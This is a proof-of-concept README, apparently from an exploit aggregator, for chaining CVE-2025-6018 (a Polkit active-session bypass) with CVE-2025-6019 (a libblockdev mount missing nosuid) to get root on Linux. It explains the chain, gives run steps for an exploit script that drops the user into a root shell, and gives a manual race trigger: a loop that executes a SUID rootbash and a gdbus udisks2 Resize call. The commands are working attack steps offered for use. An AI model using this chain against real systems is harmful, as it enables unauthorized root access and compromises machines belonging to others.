## https://sploitus.com/exploit?id=A3FCA7C9-347C-53A1-9BD7-A4D9CDE3528B
# CVE-2025-6018 & CVE-2025-6019 PoC
A Proof of Concept for chaining **CVE-2025-6018** (PAM/Polkit Active Session Bypass) and **CVE-2025-6019** (libblockdev SUID Mount Flaw) to achieve Local Privilege Escalation (LPE) on vulnerable Linux systems.
## Disclaimer
This tool is for **educational purposes and authorized testing only**. Do not use this on systems you do not own or have explicit permission to test.
## The Vulnerability Chain
1. **CVE-2025-6018:** A misconfiguration in PAM/Polkit allows remote SSH sessions to be flagged as `Active=yes`. This grants the user "physical console" privileges, bypassing authentication for hardware management tools like `udisks2`.
2. **CVE-2025-6019:** The `libblockdev` library (used by `udisks2`) fails to apply the `nosuid` flag when temporarily mounting a filesystem for maintenance operations (like `Resize` or `Repair`).
3. **The Chain:** By creating a malicious XFS image with a SUID binary, setting up a loop device (allowed via CVE-2025-6018), and triggering a "Resize" via D-Bus (triggering CVE-2025-6019), we can execute the SUID binary during the split-second temporary mount.
## Usage
### Prerequisites
* A user account on the target machine (SSH access).
* `udisks2` and `libblockdev` installed.
* `mkfs.xfs` (optional; script attempts to handle it).
### Exploitation
1. Clone this repository or upload `exploit.sh` to the target.
2. Make the script executable:
```bash
chmod +x exploit.sh
```
3. Run the exploit:
```bash
./exploit.sh
```
4. If successful, you will be dropped into a root shell (`#`).
## ๐ Manual Trigger (If script fails)
If the automated race condition fails, use two terminals:
**Terminal 1 (The Catcher):**
```bash
while true; do
VULN_PATH=$(mount | grep "loop0" | grep -v "run/media" | awk '{print $3}')
if [ -n "$VULN_PATH" ]; then
$VULN_PATH/rootbash -p
break
fi
done
```
**Terminal 2 (The Trigger):**
```bash
gdbus call --system --dest org.freedesktop.UDisks2 \
--object-path /org/freedesktop/UDisks2/block_devices/loop0 \
--method org.freedesktop.UDisks2.Filesystem.Resize 420480256 "{}"
```
### Reference
https://www.helpnetsecurity.com/2025/06/18/chaining-two-lpes-to-get-root-most-linux-distros-vulnerable-cve-2025-6018-cve-2025-6019/